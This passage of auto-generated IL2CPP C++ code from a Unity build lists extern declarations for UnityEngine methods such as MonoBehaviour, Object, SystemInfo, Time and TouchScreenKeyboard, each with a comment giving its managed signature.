extern void MonoBehaviour_CancelInvoke_m7D8ECB590BDCFDF60B3CE4D080DD8E530FA3789B (void);
// 0x00000587 System.Boolean UnityEngine.MonoBehaviour::IsInvoking(UnityEngine.MonoBehaviour,System.String)
extern void MonoBehaviour_IsInvoking_mFEBECFBEEA6E8B2BBF3D28F0EE12DF4D3B68617D (void);
// 0x00000588 System.Boolean UnityEngine.MonoBehaviour::IsObjectMonoBehaviour(UnityEngine.Object)
extern void MonoBehaviour_IsObjectMonoBehaviour_mB0B8BF666F0D42A208ADACA67DEA9838DE06198C (void);
// 0x00000589 UnityEngine.Coroutine UnityEngine.MonoBehaviour::StartCoroutineManaged(System.String,System.Object)
extern void MonoBehaviour_StartCoroutineManaged_m014E764B40594337F2B5AA03BFFC87DD8D4B063B (void);
// 0x0000058A UnityEngine.Coroutine UnityEngine.MonoBehaviour::StartCoroutineManaged2(System.Collections.IEnumerator)
extern void MonoBehaviour_StartCoroutineManaged2_m55C19C5C5C65E9883E12101A46F37AB1172C73E8 (void);
// 0x0000058B System.Void UnityEngine.MonoBehaviour::StopCoroutineManaged(UnityEngine.Coroutine)
extern void MonoBehaviour_StopCoroutineManaged_m35C1C524554F9B058538E41E0650FA71373F292D (void);
// 0x0000058C System.Void UnityEngine.MonoBehaviour::StopCoroutineFromEnumeratorManaged(System.Collections.IEnumerator)
extern void MonoBehaviour_StopCoroutineFromEnumeratorManaged_m81B57000F7ACB16B333800D66E8C74E7481E20B8 (void);
// 0x0000058D System.String UnityEngine.MonoBehaviour::GetScriptClassName()
extern void MonoBehaviour_GetScriptClassName_m428B33342B759D78A638B6E383F0510F294DE285 (void);
// 0x0000058E System.Void UnityEngine.MonoBehaviour::.ctor()
extern void MonoBehaviour__ctor_m592DB0105CA0BC97AA1C5F4AD27B12D68A3B7C1E (void);
// 0x0000058F System.Void UnityEngine.NoAllocHelpers::ResizeList(System.Collections.Generic.List`1<T>,System.Int32)
// 0x00000590 System.Void UnityEngine.NoAllocHelpers::EnsureListElemCount(System.Collections.Generic.List`1<T>,System.Int32)
// 0x00000591 System.Int32 UnityEngine.NoAllocHelpers::SafeLength(System.Array)
extern void NoAllocHelpers_SafeLength_m41483EBB0590014E0643B374E0306ABDB65BC641 (void);
// 0x00000592 System.Int32 UnityEngine.NoAllocHelpers::SafeLength(System.Collections.Generic.List`1<T>)
// 0x00000593 System.Void UnityEngine.NoAllocHelpers::Internal_ResizeList(System.Object,System.Int32)
extern void NoAllocHelpers_Internal_ResizeList_mA800014452877282A23161C2057727B0B7AFE537 (void);
// 0x00000594 System.Array UnityEngine.NoAllocHelpers::ExtractArrayFromList(System.Object)
extern void NoAllocHelpers_ExtractArrayFromList_m56D1BC9F44147722393AEE49591480CA9F1E635B (void);
// 0x00000595 System.Int32 UnityEngine.RangeInt::get_end()
extern void RangeInt_get_end_m5835FBEB410CB8AC0928AEFD95728A9AD57F6C63 (void);
// 0x00000596 System.Void UnityEngine.RangeInt::.ctor(System.Int32,System.Int32)
extern void RangeInt__ctor_m3CB91E79C7B5AED97E564581025B2F66778B7CBE (void);
// 0x00000597 System.Void UnityEngine.RuntimeInitializeOnLoadMethodAttribute::.ctor()
extern void RuntimeInitializeOnLoadMethodAttribute__ctor_m11E2CC84855B5C6E95A279E1A6D2342506CD9DCA (void);
// 0x00000598 System.Void UnityEngine.RuntimeInitializeOnLoadMethodAttribute::.ctor(UnityEngine.RuntimeInitializeLoadType)
extern void RuntimeInitializeOnLoadMethodAttribute__ctor_mA563B1C8896C6490F88C060E13950DB600577352 (void);
// 0x00000599 System.Void UnityEngine.RuntimeInitializeOnLoadMethodAttribute::set_loadType(UnityEngine.RuntimeInitializeLoadType)
extern void RuntimeInitializeOnLoadMethodAttribute_set_loadType_mCB29F9D9D69AB012FB797AB433AD3CFCE696AF10 (void);
// 0x0000059A System.Void UnityEngine.ScriptableObject::.ctor()
extern void ScriptableObject__ctor_mD037FDB0B487295EA47F79A4DB1BF1846C9087FF (void);
// 0x0000059B UnityEngine.ScriptableObject UnityEngine.ScriptableObject::CreateInstance(System.Type)
extern void ScriptableObject_CreateInstance_m986453A5542E9241E445F5F525212CF0C0BCCCBC (void);
// 0x0000059C T UnityEngine.ScriptableObject::CreateInstance()
// 0x0000059D System.Void UnityEngine.ScriptableObject::CreateScriptableObject(UnityEngine.ScriptableObject)
extern void ScriptableObject_CreateScriptableObject_mE2EF43086320F9DCCEE1DE2B71F09DF34C2C643B (void);
// 0x0000059E UnityEngine.ScriptableObject UnityEngine.ScriptableObject::CreateScriptableObjectInstanceFromType(System.Type,System.Boolean)
extern void ScriptableObject_CreateScriptableObjectInstanceFromType_m465D7CDD61A43D1C647E1803F7C20865347B8D18 (void);
// 0x0000059F System.String[] UnityEngine.ScriptingRuntime::GetAllUserAssemblies()
extern void ScriptingRuntime_GetAllUserAssemblies_m3CD77CA324FE78FDE80F23C759F1E11D010DB554 (void);
// 0x000005A0 System.Boolean UnityEngine.ScriptingUtility::IsManagedCodeWorking()
extern void ScriptingUtility_IsManagedCodeWorking_mD9BE981B037F4AF13BCBE5163B917A54941D9A5E (void);
// 0x000005A1 System.Void UnityEngine.SelectionBaseAttribute::.ctor()
extern void SelectionBaseAttribute__ctor_m6B586E58B9F8CF4D6ADF3802179F67174301F063 (void);
// 0x000005A2 System.Void UnityEngine.StackTraceUtility::SetProjectFolder(System.String)
extern void StackTraceUtility_SetProjectFolder_mA96430783E940B27984E29CD1F7AA0164E93DD7C (void);
// 0x000005A3 System.String UnityEngine.StackTraceUtility::ExtractStackTrace()
extern void StackTraceUtility_ExtractStackTrace_m4413541A7935693D72659C7FAEA3AF14DADA91E8 (void);
// 0x000005A4 System.Void UnityEngine.StackTraceUtility::ExtractStringFromExceptionInternal(System.Object,System.String&,System.String&)
extern void StackTraceUtility_ExtractStringFromExceptionInternal_m49FDC71635976B823BD8F9746A6EB09B8A46F257 (void);
// 0x000005A5 System.String UnityEngine.StackTraceUtility::ExtractFormattedStackTrace(System.Diagnostics.StackTrace)
extern void StackTraceUtility_ExtractFormattedStackTrace_m39C2E00A2984D55CDE243E0C943C5CA786DCC23F (void);
// 0x000005A6 System.Void UnityEngine.StackTraceUtility::.cctor()
extern void StackTraceUtility__cctor_m85F194351F69FC85454DE8E862961319A82DCE44 (void);
// 0x000005A7 System.Void UnityEngine.UnityException::.ctor()
extern void UnityException__ctor_m2FFB2690639A7421DA5DBFC40091AB23D87EA90F (void);
// 0x000005A8 System.Void UnityEngine.UnityException::.ctor(System.String)
extern void UnityException__ctor_mF8A65C9C71A1E0DE6A3224467040765901959312 (void);
// 0x000005A9 System.Void UnityEngine.UnityException::.ctor(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext)
extern void UnityException__ctor_m9260470FF42AFD0B748D3A3EF1E4DC857C6EE7A1 (void);
// 0x000005AA System.Byte[] UnityEngine.TextAsset::get_bytes()
extern void TextAsset_get_bytes_m244B31755642C9623B570FC96B9A04523B1E5178 (void);
// 0x000005AB System.String UnityEngine.TextAsset::get_text()
extern void TextAsset_get_text_m36846042E3CF3D9DD337BF3F8B2B1902D10C8FD9 (void);
// 0x000005AC System.String UnityEngine.TextAsset::ToString()
extern void TextAsset_ToString_m6A506652E11BF9679E6BE931EA2844035FF68923 (void);
// 0x000005AD System.String UnityEngine.TextAsset::DecodeString(System.Byte[])
extern void TextAsset_DecodeString_mEE45B5C1BB928E2E51EF0A8617C40F214812D2B5 (void);
// 0x000005AE System.Void UnityEngine.TextAsset/EncodingUtility::.cctor()
extern void EncodingUtility__cctor_mFC0B683FF0A152A62F11A40F69DCA3F187E35B90 (void);
// 0x000005AF System.Void UnityEngine.TrackedReference::.ctor()
extern void TrackedReference__ctor_m0E498FD0AD5807B7B91CB0005170E522DAE3616A (void);
// 0x000005B0 System.Boolean UnityEngine.TrackedReference::op_Equality(UnityEngine.TrackedReference,UnityEngine.TrackedReference)
extern void TrackedReference_op_Equality_m262259F41029064140AB4CDF47F28F3F99CD9D8C (void);
// 0x000005B1 System.Boolean UnityEngine.TrackedReference::Equals(System.Object)
extern void TrackedReference_Equals_m20098EB084F9E628BDA17EE946243D5D7859B94B (void);
// 0x000005B2 System.Int32 UnityEngine.TrackedReference::GetHashCode()
extern void TrackedReference_GetHashCode_m8EA3A2C10DDC17CC28849D41CA14B79535C90779 (void);
// 0x000005B3 System.Void UnityEngine.UnhandledExceptionHandler::RegisterUECatcher()
extern void UnhandledExceptionHandler_RegisterUECatcher_mE7ED82F8687FE43BF023E83EF04BB41478A26FB0 (void);
// 0x000005B4 System.Void UnityEngine.UnhandledExceptionHandler/<>c::.cctor()
extern void U3CU3Ec__cctor_m5DA03BA4D3A514FA5B66755E6209E4D05E04AF3B (void);
// 0x000005B5 System.Void UnityEngine.UnhandledExceptionHandler/<>c::.ctor()
extern void U3CU3Ec__ctor_mFC700DE43CA4803F7317D49C21D6010E21E4C40D (void);
// 0x000005B6 System.Void UnityEngine.UnhandledExceptionHandler/<>c::<RegisterUECatcher>b__0_0(System.Object,System.UnhandledExceptionEventArgs)
extern void U3CU3Ec_U3CRegisterUECatcherU3Eb__0_0_mD21DF44CEC3DA35516DA5FC75CA8A2FF67E4E382 (void);
// 0x000005B7 System.Int32 UnityEngine.Object::GetInstanceID()
extern void Object_GetInstanceID_m554FF4073C9465F3835574CC084E68AAEEC6CC6A (void);
// 0x000005B8 System.Int32 UnityEngine.Object::GetHashCode()
extern void Object_GetHashCode_m3FA03DBF8CFF6584BCD22BCFDD257AED8DEB5872 (void);
// 0x000005B9 System.Boolean UnityEngine.Object::Equals(System.Object)
extern void Object_Equals_m086D5CEE892DA62DEE463ACFBA493174C56EDAD0 (void);
// 0x000005BA System.Boolean UnityEngine.Object::op_Implicit(UnityEngine.Object)
extern void Object_op_Implicit_m18E1885C296CC868AC918101523697CFE6413C79 (void);
// 0x000005BB System.Boolean UnityEngine.Object::CompareBaseObjects(UnityEngine.Object,UnityEngine.Object)
extern void Object_CompareBaseObjects_mE043D470C367D7EE424790E163D4EB59F2B2AF8D (void);
// 0x000005BC System.Boolean UnityEngine.Object::IsNativeObjectAlive(UnityEngine.Object)
extern void Object_IsNativeObjectAlive_mA1A54A0D1E232AEAC7A4D97ADDE65616EF11096C (void);
// 0x000005BD System.IntPtr UnityEngine.Object::GetCachedPtr()
extern void Object_GetCachedPtr_m3B66BC474B4F735F68184F00248385BAF9AF650B (void);
// 0x000005BE System.String UnityEngine.Object::get_name()
extern void Object_get_name_mAC2F6B897CF1303BA4249B4CB55271AFACBB6392 (void);
// 0x000005BF System.Void UnityEngine.Object::set_name(System.String)
extern void Object_set_name_mC79E6DC8FFD72479C90F0C4CC7F42A0FEAF5AE47 (void);
// 0x000005C0 UnityEngine.Object UnityEngine.Object::Instantiate(UnityEngine.Object,UnityEngine.Vector3,UnityEngine.Quaternion)
extern void Object_Instantiate_mA736122BD463ED7A689D245C55B114C7BD9F3660 (void);
// 0x000005C1 UnityEngine.Object UnityEngine.Object::Instantiate(UnityEngine.Object)
extern void Object_Instantiate_m24741FECC461F230DBD3E76CD6AEE2E395CB340D (void);
// 0x000005C2 UnityEngine.Object UnityEngine.Object::Instantiate(UnityEngine.Object,UnityEngine.Transform,System.Boolean)
extern void Object_Instantiate_m84AD2E7D61D7842E705FAAA173B04F8964CABA77 (void);
// 0x000005C3 T UnityEngine.Object::Instantiate(T)
// 0x000005C4 T UnityEngine.Object::Instantiate(T,UnityEngine.Vector3,UnityEngine.Quaternion)
// 0x000005C5 T UnityEngine.Object::Instantiate(T,UnityEngine.Transform)
// 0x000005C6 T UnityEngine.Object::Instantiate(T,UnityEngine.Transform,System.Boolean)
// 0x000005C7 System.Void UnityEngine.Object::Destroy(UnityEngine.Object,System.Single)
extern void Object_Destroy_m0E1B4CF8C29EB7FC8658C2C84C57F49C0DD12C91 (void);
// 0x000005C8 System.Void UnityEngine.Object::Destroy(UnityEngine.Object)
extern void Object_Destroy_mFCDAE6333522488F60597AF019EA90BB1207A5AA (void);
// 0x000005C9 System.Void UnityEngine.Object::DestroyImmediate(UnityEngine.Object,System.Boolean)
extern void Object_DestroyImmediate_m6AAC658EE0D1AE43E4F185137E870941FBA542FD (void);
// 0x000005CA System.Void UnityEngine.Object::DestroyImmediate(UnityEngine.Object)
extern void Object_DestroyImmediate_m8249CABCDF344BE3A67EE765122EBB415DC2BC57 (void);
// 0x000005CB UnityEngine.Object[] UnityEngine.Object::FindObjectsOfType(System.Type)
extern void Object_FindObjectsOfType_m26A7F8711A45112BF7D30F5273B79DE1F3A7C13F (void);
// 0x000005CC UnityEngine.Object[] UnityEngine.Object::FindObjectsOfType(System.Type,System.Boolean)
extern void Object_FindObjectsOfType_m9BB0460755C903B9E5BAFF3723649F28764C4356 (void);
// 0x000005CD System.Void UnityEngine.Object::DontDestroyOnLoad(UnityEngine.Object)
extern void Object_DontDestroyOnLoad_m303AA1C4DC810349F285B4809E426CBBA8F834F9 (void);
// 0x000005CE UnityEngine.HideFlags UnityEngine.Object::get_hideFlags()
extern void Object_get_hideFlags_mA08F5E41671B8C6B5073C6B9E2799BCE6E0DF7F3 (void);
// 0x000005CF System.Void UnityEngine.Object::set_hideFlags(UnityEngine.HideFlags)
extern void Object_set_hideFlags_mACB8BFC903FB3B01BBD427753E791BF28B5E33D4 (void);
// 0x000005D0 T[] UnityEngine.Object::FindObjectsOfType()
// 0x000005D1 T UnityEngine.Object::FindObjectOfType()
// 0x000005D2 System.Void UnityEngine.Object::CheckNullArgument(System.Object,System.String)
extern void Object_CheckNullArgument_m93E646E76D8C0A9061CAD32FCA94E603893D5DD8 (void);
// 0x000005D3 UnityEngine.Object UnityEngine.Object::FindObjectOfType(System.Type,System.Boolean)
extern void Object_FindObjectOfType_mE0EB704DF7004A4FAB299C5EEE92F4B2C537C3FB (void);
// 0x000005D4 System.String UnityEngine.Object::ToString()
extern void Object_ToString_m590B13E2C40DB814E3CF9C3615952B3CC7C4B36C (void);
// 0x000005D5 System.Boolean UnityEngine.Object::op_Equality(UnityEngine.Object,UnityEngine.Object)
extern void Object_op_Equality_mD3DB0D72CE0250C84033DC2A90AEF9D59896E536 (void);
// 0x000005D6 System.Boolean UnityEngine.Object::op_Inequality(UnityEngine.Object,UnityEngine.Object)
extern void Object_op_Inequality_m4D656395C27694A7F33F5AA8DE80A7AAF9E20BA7 (void);
// 0x000005D7 System.Int32 UnityEngine.Object::GetOffsetOfInstanceIDInCPlusPlusObject()
extern void Object_GetOffsetOfInstanceIDInCPlusPlusObject_m342983C256673DD1A40ADA0D56EEB7E677D7B618 (void);
// 0x000005D8 UnityEngine.Object UnityEngine.Object::Internal_CloneSingle(UnityEngine.Object)
extern void Object_Internal_CloneSingle_mAC9821862527DC97F2352A298D8C095333911238 (void);
// 0x000005D9 UnityEngine.Object UnityEngine.Object::Internal_CloneSingleWithParent(UnityEngine.Object,UnityEngine.Transform,System.Boolean)
extern void Object_Internal_CloneSingleWithParent_mEDF9543DC0EDB3088AE9851EA318CB4E1B27B651 (void);
// 0x000005DA UnityEngine.Object UnityEngine.Object::Internal_InstantiateSingle(UnityEngine.Object,UnityEngine.Vector3,UnityEngine.Quaternion)
extern void Object_Internal_InstantiateSingle_m31BF01213B7C4B54DCC925F69D6EC7175CAE7660 (void);
// 0x000005DB System.String UnityEngine.Object::ToString(UnityEngine.Object)
extern void Object_ToString_m31CAA90829967D51B79DC3524958E33F19E4D2E4 (void);
// 0x000005DC System.String UnityEngine.Object::GetName(UnityEngine.Object)
extern void Object_GetName_mF4FCA21D07EFB04CA60457B3C6C2D2E7F4365B59 (void);
// 0x000005DD System.Void UnityEngine.Object::SetName(UnityEngine.Object,System.String)
extern void Object_SetName_m5B8C214C889B3015987383429E6CC50461BB50C3 (void);
// 0x000005DE UnityEngine.Object UnityEngine.Object::FindObjectFromInstanceID(System.Int32)
extern void Object_FindObjectFromInstanceID_m17002728638FC7F9D53F8E125EC1CBB9AA213269 (void);
// 0x000005DF System.Void UnityEngine.Object::.ctor()
extern void Object__ctor_m2149FA40CEC8D82AC20D3508AB40C0D8EFEF68E6 (void);
// 0x000005E0 System.Void UnityEngine.Object::.cctor()
extern void Object__cctor_m36E6427E59B2E10DCEBB6ACBEF692F4F8CB7428F (void);
// 0x000005E1 UnityEngine.Object UnityEngine.Object::Internal_InstantiateSingle_Injected(UnityEngine.Object,UnityEngine.Vector3&,UnityEngine.Quaternion&)
extern void Object_Internal_InstantiateSingle_Injected_m42B7BCD16E55615212F4D083EEC4D73CF980AA95 (void);
// 0x000005E2 System.Void UnityEngine.UnitySynchronizationContext::.ctor(System.Int32)
extern void UnitySynchronizationContext__ctor_m4BA1C7C04C4B82783FDC935C2C50639211B11F5C (void);
// 0x000005E3 System.Void UnityEngine.UnitySynchronizationContext::.ctor(System.Collections.Generic.List`1<UnityEngine.UnitySynchronizationContext/WorkRequest>,System.Int32)
extern void UnitySynchronizationContext__ctor_m3CC3D812A97540AB584CECA78B735D68FF30E4F0 (void);
// 0x000005E4 System.Void UnityEngine.UnitySynchronizationContext::Send(System.Threading.SendOrPostCallback,System.Object)
extern void UnitySynchronizationContext_Send_mB69AAB0638FC77BD51BFA5BF7D2B0D568BBEB7F4 (void);
// 0x000005E5 System.Void UnityEngine.UnitySynchronizationContext::Post(System.Threading.SendOrPostCallback,System.Object)
extern void UnitySynchronizationContext_Post_mD36839040EBAB66116699E68558BB8FDFF0FD834 (void);
// 0x000005E6 System.Threading.SynchronizationContext UnityEngine.UnitySynchronizationContext::CreateCopy()
extern void UnitySynchronizationContext_CreateCopy_m11E8C66F575BC1DF3F34A614E6B00D040745301A (void);
// 0x000005E7 System.Void UnityEngine.UnitySynchronizationContext::Exec()
extern void UnitySynchronizationContext_Exec_m7E6352CBA70E4AB14F7D50A919C3F8C22F2E977A (void);
// 0x000005E8 System.Boolean UnityEngine.UnitySynchronizationContext::HasPendingTasks()
extern void UnitySynchronizationContext_HasPendingTasks_m5B62CCDDC05BCC946CB158FECC5FA6422DE1C960 (void);
// 0x000005E9 System.Void UnityEngine.UnitySynchronizationContext::InitializeSynchronizationContext()
extern void UnitySynchronizationContext_InitializeSynchronizationContext_mA8D1CAFE5270AA9F9E1BD4F69C411E6162D8C9B7 (void);
// 0x000005EA System.Void UnityEngine.UnitySynchronizationContext::ExecuteTasks()
extern void UnitySynchronizationContext_ExecuteTasks_m6DFF66962403ECE20CF5F8B6E3F739ED17371838 (void);
// 0x000005EB System.Boolean UnityEngine.UnitySynchronizationContext::ExecutePendingTasks(System.Int64)
extern void UnitySynchronizationContext_ExecutePendingTasks_m5942ABE66E17314880157FBF00C7FA59CA59C886 (void);
// 0x000005EC System.Void UnityEngine.UnitySynchronizationContext/WorkRequest::.ctor(System.Threading.SendOrPostCallback,System.Object,System.Threading.ManualResetEvent)
extern void WorkRequest__ctor_m78DC33ED88BF9BA29E05D2180B2ADC439132F1F5 (void);
// 0x000005ED System.Void UnityEngine.UnitySynchronizationContext/WorkRequest::Invoke()
extern void WorkRequest_Invoke_mBFEC6A3799BAFDE7ED840A0523D3D56160C03921 (void);
// 0x000005EE System.Void UnityEngine.WaitForEndOfFrame::.ctor()
extern void WaitForEndOfFrame__ctor_m4AF7E576C01E6B04443BB898B1AE5D645F7D45AB (void);
// 0x000005EF System.Void UnityEngine.WaitForFixedUpdate::.ctor()
extern void WaitForFixedUpdate__ctor_m28D22FD61960FCD538753493FAC080DA5EC7A9E7 (void);
// 0x000005F0 System.Void UnityEngine.WaitForSeconds::.ctor(System.Single)
extern void WaitForSeconds__ctor_m579F95BADEDBAB4B3A7E302C6EE3995926EF2EFC (void);
// 0x000005F1 System.Single UnityEngine.WaitForSecondsRealtime::get_waitTime()
extern void WaitForSecondsRealtime_get_waitTime_m385602BA6C66A6169695FE9AD78F2B24F4FF8573 (void);
// 0x000005F2 System.Void UnityEngine.WaitForSecondsRealtime::set_waitTime(System.Single)
extern void WaitForSecondsRealtime_set_waitTime_m8317E2B7A2B2DC4E4A1B0CD0F9D4479294B51FB5 (void);
// 0x000005F3 System.Boolean UnityEngine.WaitForSecondsRealtime::get_keepWaiting()
extern void WaitForSecondsRealtime_get_keepWaiting_m175C5DD180DFA38A323FA6C4C8EB058DBFC0A7CA (void);
// 0x000005F4 System.Void UnityEngine.WaitForSecondsRealtime::.ctor(System.Single)
extern void WaitForSecondsRealtime__ctor_mBFC1E4F0E042D5EC6E7EEB211A2FE5193A8F6D6F (void);
// 0x000005F5 System.Void UnityEngine.WaitForSecondsRealtime::Reset()
extern void WaitForSecondsRealtime_Reset_m44618BC7268A087CA316629EDF87282D37B6EAA4 (void);
// 0x000005F6 System.Void UnityEngine.YieldInstruction::.ctor()
extern void YieldInstruction__ctor_m23280B9DFE9C3E80554A656B4E7125BC9B2C027B (void);
// 0x000005F7 System.Void UnityEngine.SerializeField::.ctor()
extern void SerializeField__ctor_mD3D7B72B71C1F3F70060E2830710F48F965C753E (void);
// 0x000005F8 System.Void UnityEngine.ISerializationCallbackReceiver::OnBeforeSerialize()
// 0x000005F9 System.Void UnityEngine.ISerializationCallbackReceiver::OnAfterDeserialize()
// 0x000005FA System.Int32 UnityEngine.ComputeShader::FindKernel(System.String)
extern void ComputeShader_FindKernel_m3BA5C50794FA6AF4C432E55FBBD7CB266532F659 (void);
// 0x000005FB System.Void UnityEngine.LowerResBlitTexture::LowerResBlitTextureDontStripMe()
extern void LowerResBlitTexture_LowerResBlitTextureDontStripMe_mEECB7042CAE059B760ABFEC12902030249248A8F (void);
// 0x000005FC System.Void UnityEngine.PreloadData::PreloadDataDontStripMe()
extern void PreloadData_PreloadDataDontStripMe_mB4D9C8C36672A400FBE7E024C47E0FD152BABA02 (void);
// 0x000005FD UnityEngine.OperatingSystemFamily UnityEngine.SystemInfo::get_operatingSystemFamily()
extern void SystemInfo_get_operatingSystemFamily_mDE6CCAF0171C5ACF6944CDA947F93107B8CF1B03 (void);
// 0x000005FE UnityEngine.Rendering.GraphicsDeviceType UnityEngine.SystemInfo::get_graphicsDeviceType()
extern void SystemInfo_get_graphicsDeviceType_m539E2B66EB19CD100050109D879AF1F55EB212E1 (void);
// 0x000005FF System.Boolean UnityEngine.SystemInfo::get_graphicsMultiThreaded()
extern void SystemInfo_get_graphicsMultiThreaded_mC76999DEBFD5E2C7A90CD6E5648FF0979E3209C1 (void);
// 0x00000600 System.Boolean UnityEngine.SystemInfo::IsValidEnumValue(System.Enum)
extern void SystemInfo_IsValidEnumValue_m0353B79800677F9CBEB837D8844391487B91B872 (void);
// 0x00000601 System.Boolean UnityEngine.SystemInfo::SupportsRenderTextureFormat(UnityEngine.RenderTextureFormat)
extern void SystemInfo_SupportsRenderTextureFormat_mFF17D2CC50B98C7859CE0536524C612965ACF763 (void);
// 0x00000602 System.Boolean UnityEngine.SystemInfo::SupportsTextureFormat(UnityEngine.TextureFormat)
extern void SystemInfo_SupportsTextureFormat_mB0695AD83D5244AFA9D65520E13FBC54F438A43D (void);
// 0x00000603 System.Int32 UnityEngine.SystemInfo::get_maxTextureSize()
extern void SystemInfo_get_maxTextureSize_mB4272D4D85179CEF11FF1CDB3E8F3786D10CA04E (void);
// 0x00000604 System.Int32 UnityEngine.SystemInfo::get_maxRenderTextureSize()
extern void SystemInfo_get_maxRenderTextureSize_m3D08F5C3C22952B70E47D554546F32DC6DBBC8AA (void);
// 0x00000605 UnityEngine.OperatingSystemFamily UnityEngine.SystemInfo::GetOperatingSystemFamily()
extern void SystemInfo_GetOperatingSystemFamily_mD60D88E10DBCBC6149118FB8C7E734E6FF6EC532 (void);
// 0x00000606 UnityEngine.Rendering.GraphicsDeviceType UnityEngine.SystemInfo::GetGraphicsDeviceType()
extern void SystemInfo_GetGraphicsDeviceType_m2F4D696CE954BC87E13535366423A83D2FB05A45 (void);
// 0x00000607 System.Boolean UnityEngine.SystemInfo::GetGraphicsMultiThreaded()
extern void SystemInfo_GetGraphicsMultiThreaded_mBC96CCCFDD98BD3646B0875BF768D7F85E20BC22 (void);
// 0x00000608 System.Boolean UnityEngine.SystemInfo::HasRenderTextureNative(UnityEngine.RenderTextureFormat)
extern void SystemInfo_HasRenderTextureNative_m75871D4023BE1BD6BBC55AD89E84F16F7F86A033 (void);
// 0x00000609 System.Boolean UnityEngine.SystemInfo::SupportsTextureFormatNative(UnityEngine.TextureFormat)
extern void SystemInfo_SupportsTextureFormatNative_m5FA73CAF815DCC227A609836FABFEB31BB99229B (void);
// 0x0000060A System.Int32 UnityEngine.SystemInfo::GetMaxTextureSize()
extern void SystemInfo_GetMaxTextureSize_mF4A562C07D3D8965C1E69370F000F6261ECDB215 (void);
// 0x0000060B System.Int32 UnityEngine.SystemInfo::GetMaxRenderTextureSize()
extern void SystemInfo_GetMaxRenderTextureSize_mFD35E2EFF8B631FCDFC1ABD32C044DABBC680B4D (void);
// 0x0000060C System.Boolean UnityEngine.SystemInfo::IsFormatSupported(UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.FormatUsage)
extern void SystemInfo_IsFormatSupported_m0F5051D3999D87A45F6CD5C80E6041F0B0C4C1E7 (void);
// 0x0000060D UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.SystemInfo::GetCompatibleFormat(UnityEngine.Experimental.Rendering.GraphicsFormat,UnityEngine.Experimental.Rendering.FormatUsage)
extern void SystemInfo_GetCompatibleFormat_m6DBEB93E6E38DEECADE82E749DC5EA43525F0B8E (void);
// 0x0000060E UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.SystemInfo::GetGraphicsFormat(UnityEngine.Experimental.Rendering.DefaultFormat)
extern void SystemInfo_GetGraphicsFormat_m710FF436E84974C7FF457EEB584ACBDDC27294AE (void);
// 0x0000060F System.Single UnityEngine.Time::get_time()
extern void Time_get_time_m0BEE9AACD0723FE414465B77C9C64D12263675F3 (void);
// 0x00000610 System.Single UnityEngine.Time::get_deltaTime()
extern void Time_get_deltaTime_m7AB6BFA101D83E1D8F2EF3D5A128AEE9DDBF1A6D (void);
// 0x00000611 System.Single UnityEngine.Time::get_unscaledTime()
extern void Time_get_unscaledTime_m99A3C76AB74B5278B44A5E8B3498E51ABBF793CA (void);
// 0x00000612 System.Single UnityEngine.Time::get_unscaledDeltaTime()
extern void Time_get_unscaledDeltaTime_m89252D23CC5AA295CFA4EB2BCB417A831AC51652 (void);
// 0x00000613 System.Single UnityEngine.Time::get_fixedDeltaTime()
extern void Time_get_fixedDeltaTime_mD7107AF06157FC18A50E14E0755CEE137E9A4088 (void);
// 0x00000614 System.Single UnityEngine.Time::get_maximumDeltaTime()
extern void Time_get_maximumDeltaTime_m3684B50F11BD53F56837D2B942DB2E48F0D1C474 (void);
// 0x00000615 System.Single UnityEngine.Time::get_timeScale()
extern void Time_get_timeScale_m99F3D47F45286D6DA73ADB2662B63451A632D413 (void);
// 0x00000616 System.Void UnityEngine.Time::set_timeScale(System.Single)
extern void Time_set_timeScale_mD6CAA4968D796C4AF198ACFB2267BDBD06DB349C (void);
// 0x00000617 System.Int32 UnityEngine.Time::get_frameCount()
extern void Time_get_frameCount_m88E5008FE9451A892DE1F43DC8587213075890A8 (void);
// 0x00000618 System.Single UnityEngine.Time::get_realtimeSinceStartup()
extern void Time_get_realtimeSinceStartup_mB49A5622E38FFE9589EB9B3E75573E443B8D63EC (void);
// 0x00000619 System.Void UnityEngine.TouchScreenKeyboard::Internal_Destroy(System.IntPtr)
extern void TouchScreenKeyboard_Internal_Destroy_mA5C9DB308B5E6B2DE666CDD495DD2487CF5B1B72 (void);
// 0x0000061A System.Void UnityEngine.TouchScreenKeyboard::Destroy()
extern void TouchScreenKeyboard_Destroy_m8B3C649CE02C77170A0F41D8EEF6E7465F8B9CAD (void);
// 0x0000061B System.Void UnityEngine.TouchScreenKeyboard::Finalize()
extern void TouchScreenKeyboard_Finalize_mCAFC1635D50B4AF9EEBFB0A5DC1D5027A2FEAA6B (void);
// 0x0000061C System.Void UnityEngine.TouchScreenKeyboard::.ctor(System.String,UnityEngine.TouchScreenKeyboardType,System.Boolean,System.Boolean,System.Boolean,System.Boolean,System.String,System.Int32)
extern void TouchScreenKeyboard__ctor_mA0C6FA07182A13B8F3F62731B94CAAD83F340861 (void);
// 0x0000061D System.IntPtr UnityEngine.TouchScreenKeyboard::TouchScreenKeyboard_InternalConstructorHelper(UnityEngine.TouchScreenKeyboard_InternalConstructorHelperArguments&,System.String,System.String)
extern void TouchScreenKeyboard_TouchScreenKeyboard_InternalConstructorHelper_m63AEA584D8F832F046664020316D1A3C0093197F (void);
// 0x0000061E System.Boolean UnityEngine.TouchScreenKeyboard::get_isSupported()
extern void TouchScreenKeyboard_get_isSupported_m92B6B1AA9E27823643C6936BDEC7FA5A2DFAD4BF (void);
// 0x0000061F System.Boolean UnityEngine.TouchScreenKeyboard::get_disableInPlaceEditing()
extern void TouchScreenKeyboard_get_disableInPlaceEditing_m410BD79B5F274B74AF4098A43202A67EE01C775F (void);
// 0x00000620 System.Boolean UnityEngine.TouchScreenKeyboard::get_isInPlaceEditingAllowed()
extern void TouchScreenKeyboard_get_isInPlaceEditingAllowed_m50508245FF28310EA21DF21848FD3C2948801917 (void);
// 0x00000621 System.Boolean UnityEngine.TouchScreenKeyboard::IsInPlaceEditingAllowed()
extern void TouchScreenKeyboard_IsInPlaceEditingAllowed_m914DA456BAF3F6A2DFA8108F39D48DE5AF2BFB18 (void);
// 0x00000622 UnityEngine.TouchScreenKeyboard UnityEngine.TouchScreenKeyboard::Open(System.String,UnityEngine.TouchScreenKeyboardType,System.Boolean,System.Boolean,System.Boolean,System.Boolean,System.String,System.Int32)
extern void TouchScreenKeyboard_Open_mBBA9483C2F0E0AA0DF9BB13EE43697A1A23E10F5 (void);
